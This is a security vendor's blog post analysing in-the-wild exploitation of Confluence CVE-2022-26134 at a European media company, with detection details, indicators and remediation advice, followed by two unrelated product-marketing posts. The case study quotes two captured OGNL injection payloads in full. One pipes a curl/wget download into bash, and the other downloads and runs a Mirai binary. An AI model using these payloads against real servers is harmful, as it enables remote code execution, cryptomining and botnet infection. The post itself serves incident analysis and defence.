Blog
/
Network
/
June 12, 2022

Confluence CVE-2022-26134 Zero-Day: Detection & Guidance

Stay informed with Darktrace's blog on detection and guidance for the Confluence CVE-2022-26134 zero-day vulnerability. Learn how to protect your systems.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Gabriel Few-Wiegratz
Product Marketing Manager, Exposure Management and Incident Readiness
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
12
Jun 2022

Summary

  • CVE-2022-26134 is an unauthenticated OGNL injection vulnerability which allows threat actors to execute arbitrary code on Atlassian Confluence Server or Data Centre products (not Cloud).
  • Atlassian has released several patches and a temporary mitigation in their security advisory. This has been consistently updated since the emergence of the vulnerability.
  • Darktrace detected and responded to an instance of exploitation in the first weekend of widespread exploits of this CVE.

Introduction

Looking forwards to 2022, the security industry expressed widespread concerns around third-party exposure and integration vulnerabilities.[1] Having already seen a handful of in-the-wild exploits against Okta (CVE-2022-22965) and Microsoft (CVE-2022-30190), the start of June has now seen another critical remote code execution (RCE) vulnerability affecting Atlassian’s Confluence range. Confluence is a popular wiki management and knowledge-sharing platform used by enterprises worldwide. This latest vulnerability (CVE-2022-26134) affects all versions of Confluence Server and Data Centre.[2] This blog will explore the vulnerability itself, an instance which Darktrace detected and responded to, and additional guidance for both the public at large and existing Darktrace customers.

Exploitation of this CVE occurs through an injection vulnerability which enables threat actors to execute arbitrary code without authentication. Injection-type attacks work by sending data to web applications in order to cause unintended results. In this instance, this involves injecting OGNL (Object-Graph Navigation Language) expressions to Confluence server memory. This is done by placing the expression in the URI of a HTTP request to the server. Threat actors can then plant a webshell which they can interact with and deploy further malicious code, without having to re-exploit the server. It is worth noting that several proofs-of-concept of this exploit have also been seen online.[3] As a widely known and critical severity exploit, it is being indiscriminately used by a range of threat actors.[4]

Atlassian advises that sites hosted on Confluence Cloud (run via AWS) are not vulnerable to this exploit and it is restricted to organizations running their own Confluence servers.[2]

Case study: European media organization

The first detected in-the-wild exploit for this zero-day was reported to Atlassian as an out-of-hours attack over the US Memorial Day weekend.[5] Darktrace analysts identified a similar instance of this exploit only a couple of days later within the network of a European media provider. This was part of a wider series of compromises affecting the account, likely involving multiple threat actors. The timing was also in line with the start of more widespread public exploitation attempts against other organizations.[6]

On the evening of June 3, Darktrace’s Enterprise Immune System identified a new text/x-shellscript download for the curl/7.61.1 user agent on a company’s Confluence server. This originated from a rare external IP address, 194.38.20[.]166. It is possible that the initial compromise came moments earlier from 95.182.120[.]164 (a suspicious Russian IP) however this could not be verified as the connection was encrypted. The download was shortly followed by file execution and outbound HTTP involving the curl agent. A further download for an executable from 185.234.247[.]8 was attempted but this was blocked by Antigena Network’s Autonomous Response. Despite this, the Confluence server then began serving sessions using the Minergate protocol on a non-standard port. In addition to mining, this was accompanied by failed beaconing connections to another rare Russian IP, 45.156.23[.]210, which had not yet been flagged as malicious on VirusTotal OSINT (Figures 1 and 2).[7][8]

Figures 1 and 2: Unrated VirusTotal pages for Russian IPs connected to during minergate activity and failed beaconing — Darktrace identification of these IP’s involvement in the Confluence exploit occurred prior to any malicious ratings being added to the OSINT profiles

Minergate is an open crypto-mining pool allowing users to add computer hashing power to a larger network of mining devices in order to gain digital currencies. Interestingly, this is not the first time Confluence has had a critical vulnerability exploited for financial gain. September 2021 saw CVE-2021-26084, another RCE vulnerability which was also taken advantage of in order to install crypto-miners on unsuspecting devices.[9]

During attempted beaconing activity, Darktrace also highlighted the download of two cf.sh files using the initial curl agent. Further malicious files were then downloaded by the device. Enrichment from VirusTotal (Figure 3) alongside the URIs, identified these as Kinsing shell scripts.[10][11] Kinsing is a malware strain from 2020, which was predominantly used to install another crypto-miner named ‘kdevtmpfsi’. Antigena triggered a Suspicious File Block to mitigate the use of this miner. However, following these downloads, additional Minergate connection attempts continued to be observed. This may indicate the successful execution of one or more scripts.

Figure 3: VirusTotal confirming evidence of Kinsing shell download

More concrete evidence of CVE-2022-26134 exploitation was detected in the afternoon of June 4. The Confluence Server received a HTTP GET request with the following URI and redirect location:

/${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash’).start()”)}/

This is a likely demonstration of the OGNL injection attack (Figures 3 and 4). The ‘nashorn’ string refers to the Nashorn Engine which is used to interpret javascript code and has been identified within active payloads used during the exploit of this CVE. If successful, a threat actor could be provided with a reverse shell for ease of continued connections (usually) with fewer restrictions to port usage.[12] Following the injection, the server showed more signs of compromise such as continued crypto-mining and SSL beaconing attempts.

Figures 4 and 5: Darktrace Advanced Search features highlighting initial OGNL injection and exploit time

Following the injection, a separate exploitation was identified. A new user agent and URI indicative of the Mirai botnet attempted to utilise the same Confluence vulnerability to establish even more crypto-mining (Figure 6). Mirai itself may have also been deployed as a backdoor and a means to attain persistency.

Figure 6: Model breach snapshot highlighting new user agent and Mirai URI

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}/

Throughout this incident, Darktrace’s Proactive Threat Notification service alerted the customer to both the Minergate and suspicious Kinsing downloads. This ensured dedicated SOC analysts were able to triage the events in real time and provide additional enrichment for the customer’s own internal investigations and eventual remediation. With zero-days often posing as a race between threat actors and defenders, this incident makes it clear that Darktrace detection can keep up with both known and novel compromises.

A full list of model detections and indicators of compromise uncovered during this incident can be found in the appendix.

Darktrace coverage and guidance

From the Kinsing shell scripts to the Nashorn exploitation, this incident showcased a range of malicious payloads and exploit methods. Although signature solutions may have picked up the older indicators, Darktrace model detections were able to provide visibility of the new. Models breached covering kill chain stages including exploit, execution, command and control and actions-on-objectives (Figure 7). With the Enterprise Immune System providing comprehensive visibility across the incident, the threat could be clearly investigated or recorded by the customer to warn against similar incidents in the future. Several behaviors, including the mass crypto-mining, were also grouped together and presented by AI Analyst to support the investigation process.

Figure 7: Device graph showing a cluster of model breaches on the Confluence Server around the exploit event

On top of detection, the customer also had Antigena in active mode, ensuring several malicious activities were actioned in real time. Examples of Autonomous Response included:

  • Antigena / Network / External Threat / Antigena Suspicious Activity Block
  • Block connections to 176.113.81[.]186 port 80, 45.156.23[.]210 port 80 and 91.241.19[.]134 port 80 for one hour
  • Antigena / Network / External Threat / Antigena Suspicious File Block
  • Block connections to 194.38.20[.]166 port 80 for two hours
  • Antigena / Network / External Threat / Antigena Crypto Currency Mining Block
  • Block connections to 176.113.81[.]186 port 80 for 24 hours

Darktrace customers can also maximise the value of this response by taking the following steps:

  • Ensure Antigena Network is deployed.
  • Regularly review Antigena breaches and set Antigena to ‘Active’ rather than ‘Human Confirmation’ mode (otherwise customers’ security teams will need to manually trigger responses).
  • Tag Confluence Servers with Antigena External Threat, Antigena Significant Anomaly or Antigena All tags.
  • Ensure Antigena has appropriate firewall integrations.

For each of these steps, more information can be found in the product guides on our Customer Portal

Wider recommendations for CVE-2022-26134

On top of Darktrace product guidance, there are several encouraged actions from the vendor:

  • Atlassian recommends updates to the following versions where this vulnerability has been fixed: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.
  • For those unable to update, temporary mitigations can be found in the formal security advisory.
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.

Appendix

Darktrace model detections (for the discussed incident)

  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous File / EXE from Rare External Location
  • Anomalous File / Script from Rare External
  • Anomalous Server Activity / Possible Denial of Service Activity
  • Anomalous Server Activity / Rare External from Server
  • Compromise / Crypto Currency Mining Activity
  • Compromise / High Volume of Connections with Beacon Score
  • Compromise / Large Number of Suspicious Failed Connections
  • Compromise / SSL Beaconing to Rare Destination
  • Device / New User Agent

IoCs

Thanks to Hyeongyung Yeom and the Threat Research Team for their contributions.

Footnotes

1. https://www.gartner.com/en/articles/7-top-trends-in-cybersecurity-for-2022

2. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. https://twitter.com/phithon_xg/status/1532887542722269184?cxt=HHwWgMCoiafG9MUqAAAA

4. https://twitter.com/stevenadair/status/1532768372911398916

5. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

6. https://www.cybersecuritydive.com/news/attackers-atlassian-confluence-zero-day-exploit/625032

7. https://www.virustotal.com/gui/ip-address/45.156.23.210

8. https://www.virustotal.com/gui/ip-address/176.113.81.186

9. https://securityboulevard.com/2021/09/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers

10. https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

11. https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d

12. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Gabriel Few-Wiegratz
Product Marketing Manager, Exposure Management and Incident Readiness

More in this series

No items found.

Blog

/

Proactive Security

/

June 4, 2025

Beyond Discovery: Adding Intelligent Vulnerability Validation to Darktrace / Attack Surface Management

Man on computer doing workDefault blog imageDefault blog image

Introducing Exploit Prediction Assessment

Security teams are drowning in vulnerability alerts, but only a fraction of those issues pose a real threat. The new Exploit Prediction Assessment feature in Darktrace / Attack Surface Management helps teams cut through the noise by validating which vulnerabilities on their external attack surface can be actively exploited.

Instead of relying solely on CVSS scores or waiting for patch cycles, Exploit Prediction Assessment uses safe, targeted simulations to test whether exposed systems can be compromised, delivering fast, evidence-based results in under 72 hours.

This capability augments traditional pen testing and complements existing ASM workflows by transforming passive discovery into actionable insight. With EPA, security teams move from reacting to long lists of potential vulnerabilities to making confident, risk-based decisions on what actually matters.

Key highlights of Exploit Prediction Assessment

Simulated attacks to validate real risk

Exploit Prediction Assessment conducts safe, simulated attacks on assets with potential security vulnerabilities that have been identified by Darktrace / Attack Surface Management. This real-time testing validates your systems' susceptibility to compromise by confirming which vulnerabilities are present and exploitable on your attack surface.

Prioritize what matters most

Confirmed security risks can be prioritized for mitigation, ensuring that the most critical threats are promptly addressed. This takes the existing letter ranking system and brings it a step further by drilling down to yet another level. Even in the most overwhelming situations, teams will be able to act on a pragmatic, clear-cut plan.

Fast results, tailored to your environment

Customers set the scope of the Exploit Prediction Assessment within Darktrace / Attack Surface Management and receive the results of the surgical vulnerability testing within 72 hours. Users will see 1 of 2 shields:

1. A green shield with a check mark: Meaning no vulnerabilities were found on scanned CVEs for the asset.

2. A red shield with a red x: Meaning at least one vulnerability was found on scanned CVEs for the asset.

Why it's a game changer

Traditionally, attack surface management tools have focused on identifying exposed assets and vulnerabilities but lacked the context to determine which issues posed the greatest risk. Without context on what’s exploitable, security teams are left triaging long lists of potential risks, operating in isolation from broader business objectives. This misalignment ultimately leads to both weakened risk posture and cross team communication and execution.

This is where Continuous Threat Exposure Management (CTEM) becomes essential. Introduced by Gartner, CTEM is a framework that helps organizations continuously assess, validate, and improve their exposure to real-world threats. The goal isn’t just visibility, it’s to understand how an attacker could move through your environment today, and what to fix first to stop them.

Exploit Prediction Assessment brings this philosophy to life within Darktrace / Attack Surface Management. By safely simulating exploit attempts against identified vulnerabilities, it validates which exposures are truly at risk—transforming ASM from a discovery tool into a risk-based decision engine.

This capability directly supports the validation and prioritization phases of CTEM, helping teams focus on exploitable vulnerabilities rather than theoretical ones.  This shift from visibility to action reduces the risk of critical vulnerabilities in the technology stack being overlooked, turning overwhelming vulnerability data into focused, clear actionable insights.

As attack surfaces continue to grow and change, organizations need more than static scans they need continuous, contextual insight. Exploit Prediction Assessment ensures your ASM efforts evolve with the threat landscape, making CTEM a practical reality, not just a strategy.

Exploit Prediction Assessment in action

With Darktrace / Attack Surface Management organizations can get Exploit Prediction Assessment, and the cyber risk team no longer guesses which vulnerabilities matter most. Instead, they identify several externally exposed areas of their attack surface, then use the feature to surgically test for exploitability across these exposed endpoints. Within 72 hours, they receive a report:  

Positive outcome: Based on information in the html or the headers it seems that a vulnerable software version is running on an externally exposed infrastructure. By running a targeted attack on this infrastructure, we can confirm that it cannot be abused.

Negative outcome: Based on information in the html or the headers it seems that a vulnerable software version is running on an externally exposed infrastructure. By running a targeted attack on this infrastructure, we can confirm that it can be exploited, so we can predict it being exploited.

This second outcome changes everything. The team immediately prioritizes the exploitable asset for patching and takes the necessary adjustments to mitigate exposure until the fix is deployed.

Instead of spreading their resources thin across dozens of alerts, they focus on what poses a real threat, saving time, reducing risk, and demonstrating actionable results to stakeholders.

Conclusion

Exploit Predication Assessment bolsters Darktrace’s commitment to proactive cybersecurity. It supports intelligent prioritization of vulnerabilities, keeping organizations ahead of emerging threats. With this new addition to / Attack Surface Management, teams have another tool to empower a more efficient approach to addressing security gaps in real-time.

Stay tuned for more updates and insights on how Darktrace continues to develop a culture of proactive security across the entire ActiveAI Security Platform.

[related-resource]

Continue reading
About the author
Kelland Goodin
Product Marketing Specialist

Blog

/

Network

/

June 3, 2025

Darktrace Recognized as a Leader in the 2025 Gartner® Magic Quadrant™ for Network Detection and Response

Man using darktrace security software on computerDefault blog imageDefault blog image

Darktrace has been recognized as a Leader in the first ever Magic Quadrant™ for Network Detection and Response (NDR).

A Gartner Magic Quadrant is a culmination of research in a specific market, giving you a wide-angle view of the relative positions of the market’s competitors. CIOs and CISOs can use this research to make informed decisions about NDR, which is evolving to offer broader threat detection. We encourage our customers to read the full report to get the complete picture.

Darktrace has also received accolades in other recent NDR leadership evaluations including IDC named as market share leader, and  KuppingerCole’s heralding us as an Overall Leader, Product Leader, Market Leader and Innovation Leader. We believe we have continued to be identified as a Leader due to the strength of our capabilities in NDR, driven by our unique application of AI in cybersecurity, continuous product innovation, and our ability to execute on a global scale to meet the evolving needs of our customers.

We’re proud of Darktrace’s unrivaled market, and ability to execute effectively in the network security market, reflecting our commitment to delivering high-quality, reliable solutions that meet the evolving needs of our customers.

Gartner MQ for NDR, NDR mq, Gartner NDR, Gartner best NDR solution
Gartner MQ for NDR

Why is Darktrace the market share leader and undisputed force in NDR?

Transforming network security and shifting to an AI-led SOC

Darktrace’s Self-Learning AITM understands normal for your entire network, intelligently detecting anomalies and containing sophisticated threats without historical attack data. This approach, based on advanced, unsupervised machine learning, enables Darktrace to catch novel, unknown and insider threats that traditional tools miss and other NDR vendors can’t detect. Darktrace has identified and contained attempted exploits of zero-day vulnerabilities up to 11 days before public disclosure.

We change SOC dynamics with our Cyber AI AnalystTM, which eliminates manual triage and investigation by contextualizing all relevant alerts across your environment, including third-party alerts, and performing end-to-end investigations at machine speed. Cyber AI Analyst gives your team the equivalent of 30 extra full time Level 2 analysts without the hiring overhead2, so you can shift your team away from manual, reactive workflows and uplift them to focus on more proactive tasks.

When combined, Darktrace Self-Learning AI and Cyber AI Analyst go far beyond the capabilities of traditional NDR approaches to completely transform your network security and help your teams operate at the speed and scale of AI.

Coverage across the extended IT enterprise and all-important OT devices

We believe the report validates the business-centric approach that Darktrace uses to deploy AI locally and train it solely on each unique environment, giving our customers tailored security outcomes without compromising on privacy.

This contrasts with other NDR vendors that require cloud connectivity to either deliver full functionality or to regularly update their globally trained models with the latest attack data. This capability is particularly sought after by organizations who are no longer just on-premise, have operational technology (OT) networks, or those that operate in classified environments.

Darktrace serves these organizations and industries by extending IT and unifying OT security within a single solution, reducing alert fatigue and accelerating alert investigation in industrial environments.

With Darktrace / NETWORK you can achieve:

  • Full visibility across your modern network, including on-premises, virtual networks, hybrid cloud, identities, remote workers and OT devices
  • Precision threat detection across your modern network to identify known, unknown and insider threats in real-time without relying on rules, signatures or threat intelligence,
  • 10x accelerated incident response times with agentic AI that uplifts your team and enables them to focus on more proactive tasks
  • Containment of threats with the first autonomous response solution proven to work in the enterprise, stopping attacks from progressing at the earliest stages with precise actions that avoid business disruption

Going beyond traditional NDR to build proactive network resilience

Darktrace does not just stop at threat detection, it helps you prevent threats from occurring and increase your resiliency for when attacks do happen. We help discover and prioritize up to 50% more risks across your environment and optimize incident response processes, reducing the impact of active cyber-attacks using an understanding of your data.

Attack path modeling: By leveraging attack path modeling and AI-driven risk validation, customers can close gaps before they’re exploited, focusing resources where they’ll have the greatest impact.

AI-driven playbooks and breach simulations: With AI-driven playbooks and realistic breach simulations, Darktrace helps your team practice response, strengthen processes, and reduce the impact of real-world incidents. You’re not just reacting; you’re proactively building long-term resilience.

Continued innovation in network security

Darktrace leads innovation in the NDR market with more than 200+ patents and active filings, covering a range of detection, response and AI techniques. Our AI Research Center is foundational to our ongoing innovation, including hundreds of R&D employees examining how AI can be applied to real-world problems and augment human teams.

Trusted by thousands of customers globally

Our commitment to innovation and patented Self-Learning AITM has protected organizations in all industries from known and novel attacks since 2013, bolstering network security and augmenting human teams for our 10,000 active customers across 110 countries. These organizations place a great deal of trust in Darktrace’s unique approach to cybersecurity and application of AI to detect and respond to threats across their modern network.

A new standard for NDR

Darktrace / NETWORK is not just another NDR tool; we are the most advanced network security platform in the industry that pushes beyond traditional capabilities to protect thousands of organizations against known and novel threats.

From real-time threat detection and autonomous response to proactive risk management, we’re transforming network security from reactive to resilient.

[related-resource]

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

References

1, 3 Gartner, Magic Quadrant for Network Detection and Response, by Thomas Lintemuth, Esraa ElTahawy, John Collins, Charanpal Bhogal, 29 May, 2025

2 Darktrace Cyber AI Analyst fleet data, 2023

Continue reading
About the author
Mikey Anderson
Product Marketing Manager, Network Detection & Response
Your data. Our AI.
Elevate your network security with Darktrace AI